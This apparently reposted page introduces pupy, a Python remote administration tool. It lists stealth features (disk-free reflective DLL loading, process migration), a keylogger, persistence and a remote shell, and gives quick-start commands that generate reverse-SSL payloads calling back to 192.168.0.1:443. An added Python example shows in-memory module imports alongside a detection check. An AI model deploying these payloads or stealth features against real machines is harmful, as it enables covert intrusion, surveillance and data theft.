Python remote administration tool: pupy

jopen, 9 years ago

Pupy is a remote administration tool with an embedded Python interpreter. Its modules can load Python packages from memory and transparently access remote Python objects. On Windows, Pupy is delivered as a reflective DLL and leaves no trace on disk.

Features:

  • On Windows, the Pupy payload is compiled as a reflective DLL and the whole Python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure Python packages (.py, .pyc) and compiled Python C extensions (.pyd). The imported Python modules do not touch the disk. (.pyd memory import currently works on Windows only; .so memory import is not implemented.)
  • Modules are quite simple to write and pupy is easily extensible.
  • Pupy uses rpyc (https://github.com/tomerfiliba/rpyc), and a module can directly access Python objects on the remote client
    • Remote objects can also be accessed interactively from the pupy shell, and even auto-completion of remote attributes works!
  • The communication channel currently works as an SSL reverse connection; a bind payload will be implemented in the future
  • All non-interactive modules can be dispatched to multiple hosts in one command
  • Multi-platform (tested on Windows 7, Windows XP, Kali Linux, Ubuntu)
  • Modules can be executed as background jobs
  • Commands and scripts running on remote hosts are interruptible
  • Auto-completion and nice colored output :-)
  • Command aliases can be defined in the config
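The "remote import from memory" feature above relies on Python's import hooks: a finder placed on sys.meta_path can serve module source from anywhere, so a package streamed over the C2 channel is executed without ever being written as a file. The block below is an added example written for this page, not pupy's own code, and it works with pure Python source only (the .pyd/.so side needs a native loader). The names MEMORY_MODULES, MemoryFinder, load_from_memory and fileless_modules are this example's own; the sample package is constructed inline. The last function shows the defender's counterpart: listing loaded modules that have no file behind them, which is exactly the trace an in-memory import leaves in the interpreter.

```python
"""In-memory module import, the mechanism behind pupy's "remote import" feature.

Added example, not pupy's own code. A meta-path finder serves module source
from a dict (standing in for the packages pupy streams over its channel), so
the imported modules never exist as files on disk. A second function shows the
other side: how a defender can spot loaded modules with no file behind them.
"""
import importlib
import importlib.abc
import importlib.util
import sys

# Constructed sample "package" as it might arrive from the server: name -> source.
MEMORY_MODULES = {
    "memdemo": "__all__ = ['helper']\n",                        # package __init__
    "memdemo.helper": (
        "MARK = 'loaded-from-memory'\n"
        "def add(a, b):\n"
        "    return a + b\n"
    ),
}


class MemoryFinder(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    """Finder + loader that resolves names against an in-memory source table."""

    def __init__(self, sources):
        self.sources = sources

    def find_spec(self, fullname, path=None, target=None):
        if fullname not in self.sources:
            return None                       # let the normal importers handle it
        # A name with children in the table is a package, so submodules resolve.
        is_pkg = any(n.startswith(fullname + ".") for n in self.sources)
        # No origin/filename is supplied, so the module gets no __file__ at all.
        return importlib.util.spec_from_loader(fullname, self, is_package=is_pkg)

    def create_module(self, spec):
        return None                           # use the default module object

    def exec_module(self, module):
        code = compile(self.sources[module.__name__], "<memory>", "exec")
        exec(code, module.__dict__)


def load_from_memory(sources, name):
    """Import `name` (and any parent packages) from `sources`, never from disk."""
    finder = MemoryFinder(sources)
    sys.meta_path.insert(0, finder)           # first finder wins
    try:
        return importlib.import_module(name)
    finally:
        sys.meta_path.remove(finder)          # modules stay cached in sys.modules


def fileless_modules():
    """Defender's view: loaded modules that have a loader but no on-disk origin.

    Built-in and frozen modules legitimately have no file and are skipped;
    anything else without a location is worth a second look.
    """
    suspicious = []
    for name, mod in list(sys.modules.items()):
        spec = getattr(mod, "__spec__", None)
        if spec is None or spec.origin in ("built-in", "frozen"):
            continue
        if not spec.has_location and getattr(mod, "__file__", None) is None:
            suspicious.append(name)
    return suspicious


if __name__ == "__main__":
    helper = load_from_memory(MEMORY_MODULES, "memdemo.helper")
    print(helper.add(2, 3), helper.MARK, hasattr(helper, "__file__"))
    print("fileless:", fileless_modules())
```

The finder is removed again after the import, but the modules remain cached in sys.modules, which is what makes the fileless_modules() check useful after the fact: a live interpreter, inspected from a debugger or a memory dump, still carries the names and the loader object even though no file on disk corresponds to them.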

Implemented modules:

  • migrate (Windows only)
    • cross-architecture injection also works (x86->x64 and x64->x86)
  • keylogger (Windows only)
  • persistence (Windows only)
  • screenshot (Windows only)
  • command execution
  • download
  • upload
  • socks5 proxy
  • interactive shell (cmd.exe, /bin/sh, ...)
  • interactive Python shell
  • shellcode exec (thanks to @byt3bl33d3r)

Quick start

In these examples the server is running on a Linux host (tested on Kali Linux) and its IP address is 192.168.0.1.
The clients have been tested on Windows 7, Windows XP, Kali Linux, Ubuntu and Mac OS X 10.10.5.

Generate/run a payload

For Windows:

./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

You can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means. The generated file itself is the one artifact you write to disk; the interpreter and modules it loads stay in memory.

For Linux (the client needs rpyc available to its Python):

pip install rpyc   # or manually copy it if you are not admin
python reverse_ssl.py 192.168.0.1:443

For Mac OS X:

easy_install rpyc   # or manually copy it if you are not admin
python reverse_ssl.py 192.168.0.1:443

Start the server

1. Optionally edit pupy.conf to change the bind address / port.
2. Start the pupy server:
./pupysh.py

Some screenshots

  • screenshot1: list connected clients
  • screenshot3: help
  • screenshot2: execute Python code on all clients
  • screenshot4: execute a command on all clients; the exception is retrieved if the command does not exist
  • screenshot5: use a filter to send a module only to selected clients
  • screenshot6: migrate into another process
  • screenshot7: interactive shell
  • screenshot8: interactive Python shell

Project homepage: http://www.open-open.com/lib/view/home/1443084003685